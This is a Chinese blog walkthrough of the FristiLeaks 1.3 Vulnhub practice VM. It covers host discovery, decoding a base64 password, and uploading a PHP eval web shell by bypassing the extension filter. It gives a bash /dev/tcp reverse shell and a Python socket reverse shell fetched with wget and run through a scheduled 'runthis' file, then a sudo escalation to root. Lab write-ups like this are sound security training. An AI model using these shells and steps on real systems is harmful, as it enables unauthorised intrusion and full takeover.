VulhubFristileaks靶机详解

最新推荐文章于 2024-09-22 14:27:08 发布
最新推荐文章于 2024-09-22 14:27:08 发布
阅读量695 收藏 12
点赞数 20
分类专栏: 靶机 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62457642/article/details/142262276
版权

项目地址

https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,修改mac地址为08:00:27:A5:A6:76,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机ip和端口

nmap 192.168.47.0-254

根据对比可知Fristileaks的ip地址为192.168.47.161,开放了80端口

信息收集

扫描目录

dirb http://192.168.47.161

一个robots.txt文件

访问网站

http://192.168.47.161

没发现啥有用信息

拼接robots.txt

给了三个路径,分别访问一下

发现都是同一张图片

回到首页再找找,最终发现首页FRISTI可以拼接

访问http://192.168.47.161/fristi来到了一个新页面

尝试sql注入和弱口令都不太行

翻翻源码

说是使用了base64加密

拷贝下来用kali 进行解密

vi a.txt
base64 -d a.txt

发现这是一个png格式的文件,输出为png查看

base64 -d a.txt > a.png

可能是个密码,结合刚才源码中得到的可能是个账户

登录

eezeepz
keKkeKKeKKeKkEkkEk

登录成功

文件上传

发现可以上传文件,写一个一句话木马文件上传

<?php phpinfo(); @eval($_POST['cmd']); ?>
vi 1.php

被告知上传失败,仅允许png,jpg,gif类型

尝试多重后缀绕过,修改1.php为1.php.jpg

mv 1.php 1.php.jpg

再次上传发现成功了,去uploads下查看

http://192.168.47.161/fristi/uploads/1.php.jpg

蚁剑连接

连接成功

反弹shell

本地开启一个监听

nc -lvvp 7272

蚁剑开启终端进行反弹

bash -c 'bash -i >& /dev/tcp/192.168.47.129/7272 0>&1'

反弹成功

提权

普通用户,sudo -l没有权限

四处翻翻

在家目录下发现三个用户

只有eezeepz目录可以进去

发现一个notes.txt,查看一下

通过这个txt文件,我们可以在/tmp目录下放一个文件名为runthis的脚本文件,反弹shell

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.47.129",6666));
os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

本地开启一个http服务,让靶机下载该文件

python -m http.server 1234

注意靶机要在/tmp目录下才能下载

wget http://192.168.47.129:1234/rev_shell.py

下载成功

kali开启一个监听

然后运行

echo "/usr/bin/python /tmp/rev_shell.py" > /tmp/runthis

反弹成功

获得一个交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

四处翻翻

在家目录翻到了两个txt和两个py文件

一个编码脚本

两个txt文件为编码后的结果

修改他的编码脚本改为解码脚本

import base64,codecs,sys
 
def decodeString(str):
  rot13string = codecs.decode(str[::-1], 'rot13')
  return base64.b64decode(rot13string)
 
print(decodeString(sys.argv[1]))

分别解码两个txt文件内容

python 1.py mVGZ3O3omkJLmy2pcuTq
python 1.py =RFn0AKnlMHMPIzpyuTI0ITG

第二串值疑似fristigod用户的密码,我们尝试登陆

su fristigod
LetThereBeFristi!

登录成功

sudo -l查看具有sudo权限的程序

以fristigod的权限运行一下

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

说是后面要加命令

跟个id试试

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id

发现是root权限

跟/bin/bash获取root的shell

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

img

提权成功

秋妤.
关注
专栏目录
XXE靶机详解
like_niustyle的博客
09-14 684
常规思路:先扫描端口,扫描目录 这里有点迷惑了,我用nessus扫了一遍扫出来两个开放端口:80和5335,。但是用nmap只扫描出来了一个80 端口 不知道是什么原因,有懂的大佬可以解释一下 不管了,根据后面的结果来看端口多一个少一个完全不影响 照例访问80: 没啥用,apache默认页面 端口5335访问不了 接下来扫目录,御剑和dirb都可以,看用什么系统了 index.html依然是apache的默认界面 robots.txt: xxe是目录,admin.php是页面 xxe: xx
iphone6 问题总结
hao1210119的博客
01-31 981
1.提示更新后 点稍后,点稍后提醒我(不输入密码),点设置,通用,储存,版本号,点删除更新,点浏览器,输入网址 ibeta.me 右滑找到屏蔽更新,点安装。 2.网页越狱 或者在苹果自带浏览器里输入 totally-not.spyware.lol 3.安装触动精灵 点cydia-软件源-右上角编辑-左上角添加-apt.touchsprite.com 添加触动精灵标准版。 如果添加失败,就将局域网的dns修改为阿里云服务器的DNS:223.5.5.5 和 223.6.6.6 4.安装快手指定版本 下载91
ios10.x越狱后闪退
weixin_34347651的博客
05-14 966
https://totally-not.spyware.lol/ 用这个shellcode 转载于:https://blog.51cto.com/haidragon/2394591
推荐探索:TotallyNotSpyware - 绝非间谍软件的奇妙之旅
gitblog_00012的博客
06-26 284
推荐探索:TotallyNotSpyware - 绝非间谍软件的奇妙之旅 去发现同类优质开源项目:https://gitcode.com/ 在技术探索的边缘,总有些项目以其独特的方式挑战着我们的认知,而今天我们探讨的正是这样一个令人“啼笑皆非”的开源项目——TotallyNotSpyware。别被它的名字迷惑,这绝对是一个旨在技术展示和教育目的的创新工具。 项目介绍 TotallyNotSpywa...
WebLogic命令执行漏洞CVE-2019-2725
2401_82451607的博客
09-22 307
WebLogic命令执行漏洞CVE-2019-2725
DC-2靶机详解
TonyChaoWei的博客
02-07 1493
上面使用了 wpscan 进行了扫描和爆破,但是漏洞扫描没有任何结果,因为现在 wpscan 扫描漏洞需要 API Token 的支持,所以需要访问 https://wpvulndb.com/users/sign_up 注册一个账号,获得 API Token。根据信息,CVE 编号为 CVE-2019-8942、CVE-2019-8943,MSF 里正好有模块,不过其实是不好利用的,因为这个漏洞是通过文件上传造成的,而 jerry 和 tom 都无法上传,只有 admin 有权限修改上传点。
VulhubSkyTower靶机详解
weixin_62457642的博客
09-17 691
靶机SkyTower速刷
VulnhubJANGOW靶机详解
weixin_62457642的博客
08-05 510
靶机JANGOW速刷
VulhubBreach 2.1靶机详解
weixin_62457642的博客
09-18 1199
靶机Breach 2.1速刷
Zico2靶机详解
a666666688的博客
09-17 785
ssh连接
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
【HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
DC-9靶机渗透详解
xiaocainiao2017的博客
12-07 2908
DC-9靶机 查看dc-9的mac地址 sudo arp-scan -l 找出dc-9的IP地址 sudo nmap -A -p- 10.9.11.26 扫描dc-9端口 访问80端口 查看wappalyzer dirb http://10.9.11.26/ 扫描目录 进入css 点击style.css 进另一个目录includes dirb效果不太好,使用dirmap。 访问http://10.9.11.26/display.php
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8503
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
SSM+JSP小型房屋租赁系统答辩PPT.pptx
10-15
计算机毕业设计答辩PPT
SSM+JSP羽毛球馆管理系统答辩PPT.pptx
10-15
计算机毕业设计答辩PPT
虚拟串口的配置使用工具
10-15
主要用来配置虚拟串口,进行虚拟串口数据的检测
python 批量实现OFD发票文件解析,并转存至excel中
最新发布
10-16
本代码初衷是Pyhton自动化,解放双手。让海量数据去跑路,让人轻松工作。 其次这是作者引导广大Python 爱好者去学习的一个过程。
Windows2008服务器上搭建五种靶机教程
"该资源是一份关于如何搭建五种不同靶机的教程,由张学飞撰写,主要针对Windows 2008服务器环境。涉及的靶机包括DVWA(Damn Vulnerable Web Application)、MCIR、Pikachu、mutillidae以及bWAPP。这些靶机主要用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值